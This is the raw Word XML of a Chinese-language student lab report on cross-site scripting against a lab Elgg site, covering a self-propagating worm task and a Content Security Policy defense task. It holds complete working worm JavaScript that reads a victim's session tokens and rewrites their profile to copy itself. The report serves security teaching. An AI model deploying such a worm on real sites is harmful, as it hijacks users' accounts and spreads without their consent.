    <w:p w14:paraId="3A537A3B" w14:textId="77777777" w:rsidR="00A15EB9" w:rsidRPr="00A15EB9" w:rsidRDefault="00A15EB9" w:rsidP="00A15EB9">
      <w:pPr>
        <w:ind w:leftChars="135" w:left="283" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6785F4D7" w14:textId="190EBBCB" w:rsidR="00A8520A" w:rsidRPr="00A8520A" w:rsidRDefault="000A4452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 w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4452">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidR="00A8520A" w:rsidRPr="00A8520A">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00A8520A" w:rsidRPr="00A8520A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Alice的账号访问Samy主页后，发现自己的profile已经被修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265143BC" w14:textId="26D8D591" w:rsidR="00A8520A" w:rsidRPr="00A8520A" w:rsidRDefault="00A8520A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F3517A" wp14:editId="2B63985C">
            <wp:extent cx="5136951" cy="175323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105"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5140166" cy="175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26652" w14:textId="5DCC134D" w:rsidR="000A4452" w:rsidRDefault="00A8520A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问题三：</w:t>
      </w:r>
      <w:r w:rsidR="00E76AB4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一行是为了不修改Samy自己的profile，一旦注释掉这一句，就会在攻击他人之前改掉自己的攻击代码，从而无法攻击访问</w:t>
      </w:r>
      <w:r w:rsidR="00A15EB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Samy主页的人。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D6AA7" w14:textId="11C3BB6B" w:rsidR="00A15EB9" w:rsidRDefault="00A15EB9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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5397A910" wp14:editId="7C3DBC8D">
            <wp:extent cx="4826248" cy="11811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B4A4" w14:textId="0CB851D1" w:rsidR="00A15EB9" w:rsidRDefault="00A15EB9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再去查看About</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me发现攻击代码将自己修改掉了：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162781D7" w14:textId="2E9725A0" w:rsidR="00A15EB9" w:rsidRDefault="00A15EB9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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C324F4C" wp14:editId="0118E12B">
            <wp:extent cx="3187864" cy="8255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481C" w14:textId="77777777" w:rsidR="00E61B2C" w:rsidRDefault="00E61B2C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</w:p>
    <w:p w14:paraId="3CD3F55F" w14:textId="23745450" w:rsidR="00A15EB9" w:rsidRDefault="00A15EB9" w:rsidP="00A15EB9">
      <w:pPr>
        <w:ind w:firstLine="1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TASK6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Writing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a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Self-Propagating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XSS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Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4B626" w14:textId="53D3F5FD" w:rsidR="00A15EB9" w:rsidRDefault="00DC0726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采用DOM方式，修改Samy的About</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F921F74" w14:textId="040E7406" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="000A4452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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A296780" wp14:editId="73078F39">
            <wp:extent cx="5274310" cy="20866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677" w14:textId="16A2DCA2" w:rsid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代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1387BA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&lt;script type="text/javascript" id="worm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444ADC3D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window.onload=function()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFD8C5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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BB16B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headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB22405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jsCode = document.getElementById("worm").innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CBEF7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lastRenderedPageBreak/>
        <w:t>var tailTag = "&lt;/" + "script&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6D9D5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wormCode = encodeURIComponent(headerTag + jsCode + tailTag);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F7A85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guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC3EB8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ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF032C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token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE958CC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name="&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49004B39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desc="&amp;description=Samy is my hero!"+wormCode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B529DA1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desc+="&amp;accesslevel[description]=2";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75EDC0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sendurl="http://www.xsslabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162EA470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 xml:space="preserve">var content=token+ts+name+desc+guid; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16670D52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 xml:space="preserve">var samyGuid="47"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76B1D9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 xml:space="preserve">if(elgg.session.user.guid!=samyGuid) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06918802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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B74B8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var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70596EF6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Ajax=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202D572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Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C3367B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Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DCBC6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Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F4286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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B7CF1F" w14:textId="77777777" w:rsidR="00DC0726" w:rsidRP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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6FD2F" w14:textId="21E1155E" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="00DC0726">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="135" w:left="283" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0726">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD7976" w14:textId="33660C96" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="00DC0726">
      <w:pPr>
        <w:widowControl/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登录Alice账号清空其profile，访问Samy主页后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F9E50" w14:textId="11773256" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind w:firstLine="1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26D60E" wp14:editId="305B58D9">
            <wp:extent cx="4641850" cy="1942580"/>
            <wp:effectExtent l="0" t="0" r="635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015" cy="1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C24B" w14:textId="33F0B579" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind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登录Boby账号，访问Alice的主页后</w:t>
      </w:r>
      <w:r w:rsidR="00687093">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，发现about</w:t>
      </w:r>
      <w:r w:rsidR="00687093">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00687093">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me</w:t>
      </w:r>
      <w:r w:rsidR="00687093">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00687093">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也被修改，可以证实这个攻击代码具有自我传播的功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A563BD" w14:textId="4DA4B187" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F8EAA65" wp14:editId="355495D2">
            <wp:extent cx="4356100" cy="1826667"/>
            <wp:effectExtent l="0" t="0" r="635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2582" cy="18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66E6" w14:textId="0D834137" w:rsidR="00DC0726" w:rsidRDefault="00DC0726" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind w:firstLine="1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lastRenderedPageBreak/>
        <w:t>TASK7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Defeating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XSS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Attacks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Using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CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF1DF2" w14:textId="281F785C" w:rsidR="002F7465" w:rsidRDefault="002F7465" w:rsidP="00DC0726">
      <w:pPr>
        <w:ind w:leftChars="67" w:left="141" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在/etc/hosts中添加信息如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69932C" w14:textId="05DB3E3B" w:rsidR="00DC0726" w:rsidRDefault="00AD4077" w:rsidP="00DC0726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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E8DD25" wp14:editId="2EB00552">
            <wp:extent cx="5274310" cy="31959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D415" w14:textId="20149799" w:rsidR="00AD4077" w:rsidRDefault="002F7465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运行http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_server.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidR="00014A29">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEF69A1" w14:textId="0DE43157" w:rsidR="00014A29" w:rsidRDefault="00014A29" w:rsidP="00014A29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 w:rsidRPr="00AD4077">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="007824F2">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.example32.com:8000/csptest.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51087FA7" w14:textId="638E8E3A" w:rsidR="00014A29" w:rsidRPr="00014A29" w:rsidRDefault="00014A29" w:rsidP="00DC0726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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF33C1B" wp14:editId="0455CD60">
            <wp:extent cx="2908449" cy="2032104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E45" w14:textId="6BFA5DA9" w:rsidR="00DC0726" w:rsidRDefault="00AD4077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 w:rsidRPr="00AD4077">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="007824F2">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.example68.com:8000/csptest.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7503E29C" w14:textId="3DFD158B" w:rsidR="00AD4077" w:rsidRDefault="00AD4077" w:rsidP="00DC0726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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31305495" wp14:editId="26299EDD">
            <wp:extent cx="2686188" cy="2013053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E745" w14:textId="0D576031" w:rsidR="00AD4077" w:rsidRDefault="00AD4077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lastRenderedPageBreak/>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="007824F2">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.example79.com:8000/csptest.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02E1B817" w14:textId="4AD583FB" w:rsidR="00014A29" w:rsidRDefault="00AD4077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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00003F6B" wp14:editId="248DAC89">
            <wp:extent cx="2724290" cy="2432175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E1D2" w14:textId="1C287DF5" w:rsidR="00014A29" w:rsidRDefault="00014A29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观察http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码，发现其只允许网站自身、来自example68.com:8000、含有nonce-1rA2345的代码执行，所以会出现以上的不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3F469" w14:textId="52ECC0D7" w:rsidR="00014A29" w:rsidRDefault="00014A29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结合上述观察，修改http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8F0B7" w14:textId="621A2B18" w:rsidR="00014A29" w:rsidRDefault="00725D6A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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F425F1" wp14:editId="0B44193A">
            <wp:extent cx="5274310" cy="22091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BE1" w14:textId="270970A9" w:rsidR="00725D6A" w:rsidRDefault="00725D6A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再次打开http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_server.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="007824F2">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.example79.com:8000/csptest.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3033D8F7" w14:textId="681B40A0" w:rsidR="00725D6A" w:rsidRDefault="00725D6A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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77A6B369" wp14:editId="513DB868">
            <wp:extent cx="3562533" cy="2203563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5AF" w14:textId="59795F2A" w:rsidR="00725D6A" w:rsidRPr="00AD4077" w:rsidRDefault="00725D6A" w:rsidP="00DC072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可以发现Fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1，2，4，5，6都显示OK。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0EAB8" w14:textId="77777777" w:rsidR="00725D6A" w:rsidRDefault="00725D6A" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind w:firstLine="1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7EAE9FD3" w14:textId="2044C2C6" w:rsidR="00625A52" w:rsidRPr="00A8520A" w:rsidRDefault="005E67DD" w:rsidP="005E67DD">
      <w:pPr>
        <w:ind w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E67DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262112CD" w14:textId="2132563A" w:rsidR="00D25ABB" w:rsidRPr="00DC0726" w:rsidRDefault="005E67DD" w:rsidP="007452D3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  <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D25ABB" w:rsidRPr="00DC0726">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D53584" w:rsidRPr="00DC0726">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E61B2C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS攻击不同于CSRF，它可以获取用户的cookie信息，并且主要运用js脚本来实现攻击目的。并且还能通过DOM方式来进行传播。但是通过CSP的安全机制可以通过明确浏览器来源是否安全来进行有效防范。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14466E" w14:textId="77777777" w:rsidR="00E67032" w:rsidRPr="00A8520A" w:rsidRDefault="00E67032" w:rsidP="00F012A6">
      <w:pPr>
        <w:ind w:leftChars="67" w:left="141" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E67032" w:rsidRPr="00A85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A609D" w14:textId="77777777" w:rsidR="000C0228" w:rsidRDefault="000C0228" w:rsidP="001040B5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7898C215" w14:textId="77777777" w:rsidR="000C0228" w:rsidRDefault="000C0228" w:rsidP="0010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79BE" w14:textId="77777777" w:rsidR="000C0228" w:rsidRDefault="000C0228" w:rsidP="001040B5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30675813" w14:textId="77777777" w:rsidR="000C0228" w:rsidRDefault="000C0228" w:rsidP="00104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F8"/>
    <w:rsid w:val="00014A29"/>
    <w:rsid w:val="000265C1"/>
    <w:rsid w:val="00054BB1"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="000715CD"/>
    <w:rsid w:val="00092132"/>
    <w:rsid w:val="000A4452"/>
    <w:rsid w:val="000B5545"/>
    <w:rsid w:val="000C0228"/>
    <w:rsid w:val="000E0C42"/>
    <w:rsid w:val="0010087D"/>
    <w:rsid w:val="001040B5"/>
    <w:rsid w:val="001104C2"/>
    <w:rsid w:val="00110975"/>
    <w:rsid w:val="00123F94"/>
    <w:rsid w:val="001310F8"/>
    <w:rsid w:val="001648A0"/>
    <w:rsid w:val="00173354"/>
    <w:rsid w:val="001A4374"/>
    <w:rsid w:val="001D0CE9"/>
    <w:rsid w:val="002315E2"/>
    <w:rsid w:val="00235DB5"/>
    <w:rsid w:val="00273316"/>
    <w:rsid w:val="00283691"/>
    <w:rsid w:val="002852C0"/>
    <w:rsid w:val="00296973"/>
    <w:rsid w:val="002B7FA3"/>
    <w:rsid w:val="002C0656"/>
    <w:rsid w:val="002C486E"/>
    <w:rsid w:val="002E5459"/>
    <w:rsid w:val="002F7465"/>
    <w:rsid w:val="003133FD"/>
    <w:rsid w:val="003368C3"/>
    <w:rsid w:val="00357DD1"/>
    <w:rsid w:val="003602C0"/>
    <w:rsid w:val="003A015F"/>
    <w:rsid w:val="003A7689"/>
    <w:rsid w:val="003C0CD6"/>
    <w:rsid w:val="003C1553"/>
    <w:rsid w:val="003D4380"/>
    <w:rsid w:val="003E4793"/>
    <w:rsid w:val="0041756D"/>
    <w:rsid w:val="0043092A"/>
    <w:rsid w:val="0043547F"/>
    <w:rsid w:val="00441CC2"/>
    <w:rsid w:val="004422F7"/>
    <w:rsid w:val="00453525"/>
    <w:rsid w:val="004676D0"/>
    <w:rsid w:val="00470FEB"/>
    <w:rsid w:val="00482ACF"/>
    <w:rsid w:val="004D2DF4"/>
    <w:rsid w:val="00503155"/>
    <w:rsid w:val="00523DDD"/>
    <w:rsid w:val="0052570F"/>
    <w:rsid w:val="00574245"/>
    <w:rsid w:val="00592EA0"/>
    <w:rsid w:val="005A05C3"/>
    <w:rsid w:val="005B53A2"/>
    <w:rsid w:val="005B5609"/>
